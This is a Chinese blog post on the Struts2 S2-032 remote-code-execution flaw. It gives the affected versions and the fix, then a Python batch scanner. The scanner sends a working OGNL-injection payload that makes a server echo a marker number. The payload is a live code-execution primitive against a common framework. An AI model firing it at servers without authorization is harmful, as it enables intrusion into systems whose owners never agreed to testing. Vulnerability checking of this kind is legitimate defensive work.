Apache Struts2任意代码执行漏洞(S2-032)检测程序

原创 2016年05月30日 15:31:09

上个月写的一段代码,记录下来以供不时之需。

漏洞概况

2016年4月21日,Struts2官方发布两个安全公告(S2-031,S2-032),其中S2-032(CVE-2016-3081)官方评级为高。Apache Struts 2是世界上最流行的Java Web服务器框架之一。该漏洞的成因是用户开启动态方法调用(Dynamic Method Invocation)的情况下,攻击者能够使用method:前缀执行远程代码。值得一提的是该漏洞是由国内企业安恒信息的员工提交的。

漏洞影响

官方给出的受影响的Struts版本号区间为Struts 2.0.0 - Struts 2.3.28 (2.3.20.2 和 2.3.24.2版本不受影响)。

目前在互联网上已有多个版本的漏洞利用POC在互联网流传,分为命令执行版本与直接写入Web后门的版本。乌云、补天等漏洞报告平台已收到大量网站的相关漏洞报告,其中银行占了很大比例,此漏洞可能会在一段时间内在各行业造成大面积的恶劣影响。

解决方案

Struts官方给出的解决方案是禁用动态方法调用功能,或者升级到Struts 2.3.20.2,2.3.24.2或2.3.28.1。

修改Struts2的配置文件如下:将“struts.enable.DynamicMethodInvocation”的值设置为false,比如:

< constant name="struts.enable.DynamicMethodInvocation" value="false" / >;

2.3.28.1版本Struts下载地址:
https://struts.apache.org/download.cgi#struts23281

上面的文字来自聚锋实验室微信公众号:

扫描关注聚锋实验室

检测程序

import sys,time,os
import requests

def do_check(url):    
    url = url.strip()
    if '?' in url:
        url = url.split('?')[0]
    poc3 = url + "?method:%23_memberAccess%3d%40ognl.OgnlContext+%40DEFAULT_MEMBER_ACCESS%2c%23k%3d+%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23k.print(56956116)%2c%23k.close"

    try:
        result = do_request(poc3)
        if "56956116" in result:
            vuls='!!!WARNING Vulnerable url: '+url
            logfilename = os.path.dirname(os.path.realpath(__file__))+"/log.txt"
            logfile = open(logfilename,"a")
            logfile.write(vuls+"\n\r")
            logfile.close()
            print vuls
        else:
            print '...Not vulnerable: '+url
    except Exception,e:
        print e

def do_request(exp,method="GET"):
    response = None
    if method == "GET":
        response = requests.get(exp, timeout=10) 
    return response.content


def main(path):
    print "Checking Struts2 (S2-032) Remote Code Execution..."
    cnt = 0
    if 'http://' in path or 'https://' in path:
        url=path
        do_check(url)
    else:
        urlfile=open(path,'r')
        for url in urlfile:
            if url.strip():
                cnt += 1
                do_check(url)
        urlfile.close()
    output = os.path.dirname(os.path.realpath(__file__))+"/log.txt"
    if os.path.exists(output):
        print "Scanned urls: %d" % cnt
        print "Output File: "+output

if __name__ == '__main__':
    args = sys.argv
    if len(args) != 2:
        print "Usage: %s [url/file]" % args[0]
        exit()
    main(args[1])
版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

Struts2 S2 – 032远程代码执行漏洞分析报告

一、漏洞基本信息 CVE编号 CVE-2016-3081 漏洞名称 Struts2 S2 – 032远程代码执行 漏洞发布日期 2016.4.15 受影响的...

Apache Struts2(S2-046)漏洞利用

0x00 前言        Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产...

Apache Struts远程命令执行漏洞、开放式式重定向漏洞

摘要:Struts应用开发框架目前广泛应用于大型互联网企业、政府、金融机构等网站建设,并作为网站开发的底层模板使用。近日网上公布了Struts一个严重的命令执行漏洞,在我国互联网环境影响巨大,本文将对...

struts2 漏洞 S2-016、S2-017修补方案

官方描述: S2-016:https://cwiki.apache.org/confluence/display/WW/S2-016 S2-017:https://cwiki.apache.org/...

用struts2 s2-045漏洞拿站记录

浏览FreeBuf时发现的文章,新出的漏洞: http://www.freebuf.com/vuls/128668.html 漏洞一出,各位大神早就写出POC: http://www.reg00...

Struts2 s2-045还未走,s2-046 就来了

参考s-045的解决方案 参考s-045的解决方案 增加过滤参数吧 --------------------Header  过滤-------------- Enumeration e= reques...

原创:struts2-045漏洞浅析

这是小弟写的第一篇网文,文笔一般,请大家多包涵。近期发生了很多事,使我醒悟要回归自我的同时,要作些改变,所以开始写网文,且把这些网文分享至个人的微信公众号(公众号名:永记士多)和CSDN博客(博客账号...

Struts2 最新高危漏洞详解

由于计算机起源于美国,因此很多新兴技术和框架也都出于美国的一些大公司。虽然国内的BAT也在开源技术上有一些贡献,但目前来说还是比较缺少用户来支持。这也就导致了国内大部分互联网公司大量的依赖国外的技术。...

Struts2远程代码执行漏洞S2-045利用及修复

升级到struts-2.3.32, 发现无法调用getter方法public class Action { private Map yTypeList = new LinkedHash...

Struts2漏洞利用 常用命令

lsb_release -a 内核版本 系统版本 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmide...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)